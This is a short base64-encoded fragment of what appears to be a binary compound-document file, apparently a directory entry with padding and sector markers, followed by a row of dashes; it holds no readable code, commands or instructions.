AbgBmAG8AcgBtAGEAdABpAG8AbgAAAAAAAAAAAAAAOAACAP///////////////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFwAAAB0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA////////////////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/v///wAAAAAAAAAA --------------------------------------------------------------------------------